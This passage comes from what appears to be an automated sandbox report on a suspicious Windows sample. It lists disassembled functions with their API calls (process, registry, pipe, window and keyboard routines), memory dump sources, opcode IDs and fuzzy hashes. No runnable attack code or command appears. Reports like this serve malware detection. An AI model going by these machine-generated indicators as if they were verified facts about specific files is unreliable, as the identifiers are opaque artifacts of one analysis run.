                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00446461
                            • LoadLibraryW.KERNEL32(?), ref: 00446468
                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0044647D
                            • DestroyWindow.USER32 ref: 00446485
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                            • String ID: SysAnimate32
                            • API String ID: 4146253029-1011021900
                            • Opcode ID: 0b2213e8c8aeee5a0e0d06ac7f96e02614028cec79d5e47b02240b67f6b0ee55
                            • Instruction ID: 603c58953c0f0ddc474fa25f89a1f06dae1be6b14d4fa9736ca365cbefc9cae9
                            • Opcode Fuzzy Hash: 0b2213e8c8aeee5a0e0d06ac7f96e02614028cec79d5e47b02240b67f6b0ee55
                            • Instruction Fuzzy Hash: 6021CF71100205BFFF108FA4DC40EBB77ACEB4A368F12462AF91492290C739DC41976A
                            Function 00426D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                            Download Yara Rule
                            APIs
                            • GetStdHandle.KERNEL32(0000000C), ref: 00426DBC
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00426DEF
                            • GetStdHandle.KERNEL32(0000000C), ref: 00426E01
                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00426E3B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateHandle$FilePipe
                            • String ID: nul
                            • API String ID: 4209266947-2873401336
                            • Opcode ID: 693a045b89bbe414361596ee7bd163a5c6a7a076b77b3d182642d88bea00e82b
                            • Instruction ID: d412ffa8e06d156203568b70128ef9d517b2ee47e00b8f46c794a8ee1b45be59
                            • Opcode Fuzzy Hash: 693a045b89bbe414361596ee7bd163a5c6a7a076b77b3d182642d88bea00e82b
                            • Instruction Fuzzy Hash: 9821B275700229ABDB209F29EC04A9A77F4FF45720F614A2AFCA0D73D0DB7498158B58
                            Function 00426E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                            Download Yara Rule
                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 00426E89
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00426EBB
                            • GetStdHandle.KERNEL32(000000F6), ref: 00426ECC
                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00426F06
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateHandle$FilePipe
                            • String ID: nul
                            • API String ID: 4209266947-2873401336
                            • Opcode ID: 6e452e7a3152b6ecfeafe01093108a678b49520abc005e121f9d0fa0ef3154b6
                            • Instruction ID: 31b7bf1cfa2ddf0ac191f648132f4b7d3486b67dc01b6d30903ecbf719581a53
                            • Opcode Fuzzy Hash: 6e452e7a3152b6ecfeafe01093108a678b49520abc005e121f9d0fa0ef3154b6
                            • Instruction Fuzzy Hash: 8D21B0797003259BDB209F69EC04A9B77A8EF45730F620A2AFCA0D33D0D774A851CB59
                            Function 0042AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0042AC54
                            • GetVolumeInformationW.KERNEL32 ref: 0042ACA8
                            • __swprintf.LIBCMT ref: 0042ACC1
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0044F910), ref: 0042ACFF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume__swprintf
                            • String ID: %lu
                            • API String ID: 3164766367-685833217
                            • Opcode ID: c39dc35a9f615a6ec076b2651988c717646ca90e1d8ac4b64badc9d357846daa
                            • Instruction ID: 1e72b24d144ca3462541bff3a93dbed02fbd6549fc5ce7dbe5dc2e58d42bbaf8
                            • Opcode Fuzzy Hash: c39dc35a9f615a6ec076b2651988c717646ca90e1d8ac4b64badc9d357846daa
                            • Instruction Fuzzy Hash: 30219034A00109AFCB10DF65D945EAF7BB8EF49314B0040AAF909DB251DB71EE45CB61
                            Function 00421142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                            Download Yara Rule
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0041FCED,?,00420D40,?,00008000), ref: 0042115F
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0041FCED,?,00420D40,?,00008000), ref: 00421184
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0041FCED,?,00420D40,?,00008000), ref: 0042118E
                            • Sleep.KERNEL32(?,?,?,?,?,?,?,0041FCED,?,00420D40,?,00008000), ref: 004211C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuerySleep
                            • String ID: @B
                            • API String ID: 2875609808-2728856099
                            • Opcode ID: 85b4d0cebe9f5bea6e7e0640a82dabe3ee85c7b6c7401d3ca046c1b49e2b89f7
                            • Instruction ID: 406ab860ba248f7140ed3db0e1fb5e62138d144d181eef4580a7495e90efd2d1
                            • Opcode Fuzzy Hash: 85b4d0cebe9f5bea6e7e0640a82dabe3ee85c7b6c7401d3ca046c1b49e2b89f7
                            • Instruction Fuzzy Hash: 83117035E0056CD7CF009FA5E8446FEBBB8FF1E711F404066EA41B2250CB7459A0CB9A
                            Function 00421AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00421B19
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                            • API String ID: 3964851224-769500911
                            • Opcode ID: c00d2c51e16373b5f1d69d9976c53d3d7d7582ee46652dd293eceb76cec27114
                            • Instruction ID: b91ab4ea3599e1dbed8e1a1ed6db7b6748e793bdb90b27bec7929eefdd765cd0
                            • Opcode Fuzzy Hash: c00d2c51e16373b5f1d69d9976c53d3d7d7582ee46652dd293eceb76cec27114
                            • Instruction Fuzzy Hash: 5B11A531D401689FCF04DF54D8519FEB7B4FF25304B50846AD814AB7A1EB326D46CB54
                            Function 0043EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0043EC07
                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0043EC37
                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0043ED6A
                            • CloseHandle.KERNEL32(?), ref: 0043EDEB
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                            • String ID:
                            • API String ID: 2364364464-0
                            • Opcode ID: 1109e852ee5b5861539ec6fb8a5f67dfbf755022bfae64b1a6588a7eb8cac48e
                            • Instruction ID: 67bd43a3ed52ea1fbd1cb8f2862bc26c5b0b02badbe6bb8d4d6c70e9794e2bdb
                            • Opcode Fuzzy Hash: 1109e852ee5b5861539ec6fb8a5f67dfbf755022bfae64b1a6588a7eb8cac48e
                            • Instruction Fuzzy Hash: DD8170716003019FD721EF29C846F2AB7E5AF88710F05881EF99ADB3D2DA74AD41CB55
                            Function 00440037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 00440E1A: CharUpperBuffW.USER32(?,?), ref: 00440E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004400FD
                            • RegOpenKeyExW.ADVAPI32 ref: 0044013C
                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00440183
                            • RegCloseKey.ADVAPI32(?), ref: 004401AF
                            • RegCloseKey.ADVAPI32(00000000), ref: 004401BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                            • String ID:
                            • API String ID: 3440857362-0
                            • Opcode ID: 723802ba293df36268fc46c257a442d9210f766e7983de57c5eed0153734f797
                            • Instruction ID: f124bba484b50eb4bb6b9e5f2b495a2b058d1ab5ffc60fd55328bae34dfa997c
                            • Opcode Fuzzy Hash: 723802ba293df36268fc46c257a442d9210f766e7983de57c5eed0153734f797
                            • Instruction Fuzzy Hash: 0D516831208204AFD715EF68C881F6AB7E9FF88304F00492EF5958B2A2DB35ED55CB56
                            Function 0043D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043D927
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043D9AA
                            • GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043D9C6
                            • GetProcAddress.KERNEL32(00000000,?,?,?,00000041,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043DA07
                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043DA21
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00427896,?,?,00000000), ref: 003C5A2C
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00427896,?,?,00000000,?,?), ref: 003C5A50
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                            • String ID:
                            • API String ID: 327935632-0
                            • Opcode ID: 821ae6c7b61ef135a5b7dd4d786566e86da8191743d592a34de822ebeadcf653
                            • Instruction ID: 1bb5897c4d5247716567e20365e6d3f7a29d4efe718821128a70226940d21e0c
                            • Opcode Fuzzy Hash: 821ae6c7b61ef135a5b7dd4d786566e86da8191743d592a34de822ebeadcf653
                            • Instruction Fuzzy Hash: F9510475A00209DFCB01EFA8D484EAEB7B5FF0D320B05806AE855AB312DB35AD45CB95
                            Function 0042E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                            Download Yara Rule
                            APIs
                            • GetPrivateProfileSectionW.KERNEL32 ref: 0042E61F
                            • GetPrivateProfileSectionW.KERNEL32 ref: 0042E648
                            • WritePrivateProfileSectionW.KERNEL32 ref: 0042E687
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • WritePrivateProfileStringW.KERNEL32 ref: 0042E6AC
                            • WritePrivateProfileStringW.KERNEL32 ref: 0042E6B4
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                            • String ID:
                            • API String ID: 1389676194-0
                            • Opcode ID: 9fcc56150684ff41df2c106e491c99a16bc2535a9595b76cb15e5e2bdeb9cfd1
                            • Instruction ID: 3d136d9ec82472de3ed3e52850047278ae920e8f961c9b1800d94fc390a59a64
                            • Opcode Fuzzy Hash: 9fcc56150684ff41df2c106e491c99a16bc2535a9595b76cb15e5e2bdeb9cfd1
                            • Instruction Fuzzy Hash: B6513935A00215EFCB01EF65D985EAEBBF5FF09314B1480A9E809AB361CB35ED51CB54
                            Function 003C2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AsyncState$ClientCursorScreen
                            • String ID:
                            • API String ID: 4210589936-0
                            • Opcode ID: 922a86a3029f727976523e7e708321f20ea652e5e72ddfdacf78d50cb3ae0e1f
                            • Instruction ID: 77620968c841cb3de0719365ca782bcd32006cf782a4f43813d8e4a93a4a3cae
                            • Opcode Fuzzy Hash: 922a86a3029f727976523e7e708321f20ea652e5e72ddfdacf78d50cb3ae0e1f
                            • Instruction Fuzzy Hash: E7419039604109FBDF169F68C844FEABB74BB05360F21432AF829922A0CB349D54DB91
                            Function 004163AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                            Download Yara Rule
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004163E7
                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00416433
                            • TranslateMessage.USER32(?), ref: 0041645C
                            • DispatchMessageW.USER32(?), ref: 00416466
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00416475
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                            • String ID:
                            • API String ID: 2108273632-0
                            • Opcode ID: 0bd49f136ccc69cee8d18f2c6eec8dc1a7e7339d89033e9b8b99d39400b87252
                            • Instruction ID: 2c3b2fdda9489028c616fa4f811963255a09b5f4535ce1d87f03cf12ee60e743
                            • Opcode Fuzzy Hash: 0bd49f136ccc69cee8d18f2c6eec8dc1a7e7339d89033e9b8b99d39400b87252
                            • Instruction Fuzzy Hash: 4231A331900656AFDB24DFB4DC44BEB7BA8AB01300F16457BE825C22A1E729D4C9DB6D
                            Function 00418A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00418A30
                            • PostMessageW.USER32 ref: 00418ADA
                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00418AE2
                            • PostMessageW.USER32 ref: 00418AF0
                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00418AF8
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessagePostSleep$RectWindow
                            • String ID:
                            • API String ID: 3382505437-0
                            • Opcode ID: b9fcea513af41dd8621aee28db12ad7dd97efcbac194bc3b7674d4dd29487c89
                            • Instruction ID: 5a0fe0b105ea1a2238d1b221325a6d450e5b3f1036d34ab82b5dd2513c6ef565
                            • Opcode Fuzzy Hash: b9fcea513af41dd8621aee28db12ad7dd97efcbac194bc3b7674d4dd29487c89
                            • Instruction Fuzzy Hash: 8231EE71900219EBDF14CFA8D94CADE3BB5EF05315F10822AF924EA2D0C7B49954CB94
                            Function 0041B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                            Download Yara Rule
                            APIs
                            • IsWindowVisible.USER32(?), ref: 0041B204
                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0041B221
                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0041B259
                            • CharUpperBuffW.USER32(00000000,00000000), ref: 0041B27F
                            • _wcsstr.LIBCMT ref: 0041B289
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                            • String ID:
                            • API String ID: 3902887630-0
                            • Opcode ID: a6e39e8e31a6abad244bbf57494ace6dabcbf3951e502921d73db6434b1a3669
                            • Instruction ID: 8c08e4be85c8d254045c545b7bcba68796032f03b6e1d210f2d8e90639f928b2
                            • Opcode Fuzzy Hash: a6e39e8e31a6abad244bbf57494ace6dabcbf3951e502921d73db6434b1a3669
                            • Instruction Fuzzy Hash: ED2107312042507BEB255B759C09EBF7B9CDF4A750F00417AF808DE2A1EFB5DC8596A4
                            Function 0044B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • GetWindowLongW.USER32(?,000000F0), ref: 0044B192
                            • SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,?,?,00430E90,00000000,?,00000000), ref: 0044B1B7
                            • SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,?,?,00430E90,00000000,?,00000000), ref: 0044B1CF
                            • GetSystemMetrics.USER32(00000004,?,?,?,?,?,?,?,00430E90,00000000,?,00000000), ref: 0044B1F8
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 0044B216
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$Long$MetricsSystem
                            • String ID:
                            • API String ID: 2294984445-0
                            • Opcode ID: f2f7e21d1b3c6b8bfdb8c6473fbdc4435a43ada3e17d6569ca9747faf07d17ed
                            • Instruction ID: 7d19397d903bba2afbabba7a7eacd56d2dfdc0674d6bdccb70fb244322a8a4e4
                            • Opcode Fuzzy Hash: f2f7e21d1b3c6b8bfdb8c6473fbdc4435a43ada3e17d6569ca9747faf07d17ed
                            • Instruction Fuzzy Hash: B8218071910651AFDB109F789C08A6A3BA4FB06361F114B3AB922D72E0D734D8219B98
                            Function 00419307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00419320
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00419352
                            • __itow.LIBCMT ref: 0041936A
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00419392
                            • __itow.LIBCMT ref: 004193A3
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$__itow$_memmove
                            • String ID:
                            • API String ID: 2983881199-0
                            • Opcode ID: 31055361bb23fb69776b437317d2b9f56b450a4755efb764b7e77d70b224212f
                            • Instruction ID: e5f403a62db63b10a4dbcb52cdd81383f9308a088270282ab9c04e28e37c6007
